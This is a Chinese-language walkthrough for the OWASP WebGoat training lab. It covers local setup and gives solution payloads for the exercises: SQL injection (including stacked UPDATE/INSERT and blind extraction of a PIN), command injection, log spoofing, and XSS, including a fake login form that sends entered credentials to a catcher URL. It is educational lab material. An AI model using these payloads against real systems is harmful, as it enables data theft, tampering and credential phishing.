2020.12.18 實作介紹

# 2020.12.18 實作介紹 ## 甚麼是Webgoat ### 官網 ![](https://i.imgur.com/JJHl5IO.png) ### 連結 https://owasp.org/www-project-webgoat/ ## 安裝環境 ### 1.安裝Java 執行環境 https://java.com/zh_TW/download/manual.jsp ### 2.設定環境變數 C:\Program Files\Java\jre1.8.0_xxx\bin ![](https://i.imgur.com/kubLBy3.png) 確定版本 java -version ### 3.下載Webgoat https://github.com/WebGoat/WebGoat/releases?after=v8.0.0.M4 ### 4.啟動Webgoat背景程式將檔案放到C:/webgoat java -jar C:/webgoat/webgoat-container-7.1-exec.jar ### 5.啟動WebGoat 網頁服務在你自己的電腦上打上這些網址 http://localhost:8080/WebGoat/ ![](https://i.imgur.com/23P6Kth.png) #### 帳密 guest/guest ## 題目練習 ### 題目一 #### Injection Flaws > Numeric SQL Injection ``` &station = 102 or 1=1 ``` 但是本題無法修改request --> 使用Tools攔截request，修改後再送出 Tool: 安裝Burp Suit Community https://portswigger.net/ ### 題目二 #### Injection Flaws > String SQL Injection ``` Smith' or '1'='1 ``` [Update] ``` Smith' ; Update salaries set salary = 1000000 where userid = 'jsmith';SELECT * from salaries where '1' = '1 ``` [Insert] ``` Smith' ; Insert Into salaries (userid,salary) values ('hello', 200);SELECT * from salaries where '1' = '1 ``` ### 題目三 #### Injection Flaws > Blind Numeric SQL Injection ``` 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 300 ); ``` ### 題目四 #### Injection Flaws > Blind String SQL Injection ``` 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' ); ``` ### 題目五 #### Injection Flaws > Command Injection ``` & netstat -an & ipconfig ``` 需安裝Burp Suit Community ### 題目六 #### Injection Flaws > Log Spoofing ``` test%0aLogin succeeded for username:admin ``` ### 題目七 #### Cross-Site Scripting (XSS) -> Reflected XSS Attacks ``` <script>alert('Activate XSS')</script> ``` ### 題目八 #### Cross-Site Scripting (XSS) -> Stored XSS Attacks ``` <script>alert('User Information has been stolen')</script> ``` ### 題目九 #### Cross-Site Scripting (XSS) -> Stage1: Stored XSS Attacks 修改自己的Profile ``` <script>alert('Link to malicious site')</script> ``` ### 題目十 #### Cross-Site Scripting (XSS) -> Phishing with XSS ``` function hack(){ alert("Login="+document.forms[0].user.value + "Password="+document.forms[0].pass.value); XSSImage=new Image; XSSImage.src="http://localhost:8080/webgoat/catcher" +"?PROPERTY=yes" +"&user="+document.forms[0].user.value +"&password="+document.forms[0].pass.value; } <form> <br><br><HR> <H3>This feature requires account login:</H3> <br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <br><br><HR> ``` ### 題目十一 #### Injection Flaws > LAB: SQL Injection ``` ' or '1'='1 ``` ### 題目十二 #### Injection Flaws > LAB: SQL Injection ``` 101 or 1=1 order by employee_id desc ```